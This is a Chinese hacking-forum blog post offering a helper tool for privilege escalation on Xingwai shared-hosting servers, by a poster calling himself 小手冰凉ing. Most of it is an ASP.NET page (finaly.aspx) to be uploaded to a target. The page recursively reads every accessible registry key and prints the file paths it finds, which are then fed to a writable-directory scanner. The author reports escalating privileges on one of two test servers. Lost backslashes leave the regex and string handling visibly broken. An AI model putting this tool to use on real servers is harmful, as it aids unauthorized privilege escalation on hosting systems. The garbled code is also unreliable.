星外提权辅助工具(绝非0day,只是辅助工具)

  • A+
所属分类:lcx

    by:小手冰凉ing

    注意:只是辅助工具而已

    原理是自动读所有可读的注册表,并自动找注册表里面存在的路径信息,然后全部echo..

    然后呢,你懂的,结合啊d的目录检测,2基友一搭配,基情无限!上图…

星外提权辅助工具(绝非0day,只是辅助工具)

    然后wt,这样一个星外就…

星外提权辅助工具(绝非0day,只是辅助工具而已)

    本工具能够找到一些目录,然后再配合可写目录扫描工具查找可写目录

    测试两台 找到可写提权成功一台 服务器有限无法进一步测试

finaly.aspx:

        Stack sack = new Stack();//测试成功,比较卡
        List list = new List();
        sack.Push(Registry.ClassesRoot);
        sack.Push(Registry.CurrentConfig);
        sack.Push(Registry.CurrentUser);
        sack.Push(Registry.LocalMachine);
        sack.Push(Registry.Users);
        while (sack.Count > 0)
        {
            RegistryKey Hklm = (RegistryKey)sack.Pop();
            if (Hklm != null)
            {
                try
                {
                    string[] names = Hklm.GetValueNames();
                    foreach (string name in names)
                    {
                        try
                        {
                            string str = Hklm.GetValue(name).ToString().ToLower();
                            if (str.IndexOf(":") != -1 && str.IndexOf("c:program files") == -1 && str.IndexOf("c:windows") == -1)
                            {
                                Regex regImg = new Regex("[a-z|A-Z]{1}:\[a-z|A-Z| |0-9|u4e00-u9fa5|~|\|_|{|}|.]*");
                                MatchCollection matches = regImg.Matches(str);
                                if (matches.Count > 0)
                                {
                                    string temp = "";
                                    foreach (Match match in matches)
                                    {
                                        temp = match.Value;
                                        if (!temp.EndsWith(""))
                                        {
                                            if (list.IndexOf(temp) == -1)
                                            {
                                                Response.Write(temp + "
");
                                                list.Add(temp);
                                            }
                                        }
                                        else
                                            temp = temp.Substring(0, temp.LastIndexOf(""));
                                        while (temp.IndexOf("") != -1)
                                        {
                                            if (list.IndexOf(temp + "") == -1)
                                            {
                                                Response.Write(temp + "
");
                                                list.Add(temp + "");
                                            }
                                            temp = temp.Substring(0, temp.LastIndexOf(""));
                                        }
                                    }
                                }
                            }
                        }
                        catch (Exception se) { }
                    }
                }
                catch (Exception ee) { }
                try
                {
                    string[] keys = Hklm.GetSubKeyNames();
                    foreach (string key in keys)
                    {
                        try
                        {
                            sack.Push(Hklm.OpenSubKey(key));
                        }
                        catch (System.Security.SecurityException sse) { }
                    }
                }
                catch (Exception ee) { }
            }
        }
%>

   

   

   

   

   

    dmjhs经常教导我在注册表里找文件路径,我也经常按他说的做,但感觉实在费事。就产生了这个想法,遍历所有有读权限的注册表位置,查找文件路径。但是我不会asp.net,只能突击了,由于只用了一个晚上一边学习一边写程序,所以代码写的比较烂,而且比较简单。直接访问工具就能得到所有注册表中的目录和文件。但是假如我们在注册表发现c:peoasj.sd  那这个是文件还是文件夹呢?本着宁可错杀一千,不能错过一个的原则,我将他做了如下处理:当做两项c:peoasj.sd(文件)和c:peoasj.sd(文件夹)

    用法:直接访问  得到所有路径  再用可写目录扫描工具(论坛上有)扫描

    程序很垃圾,正则不完善,能力有限无法改进,只为各位编程大牛提供思路,感谢dmjhs的指导以及测试。

文章来源于lcx.cc:星外提权辅助工具(绝非0day,只是辅助工具)

相关推荐: 关于eval的劫持操作

前提:本文讨论在chrome浏览器下的情况,由于早期IE浏览器的实现有所不同,导致与本文所提内容存在差异。其它浏览器也未做测试。 在某些需求环境中,我们需要劫持eval函数,输出所eval的内容。对于常规的场景来说,这一点是非常容易实现的。 var eval=…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: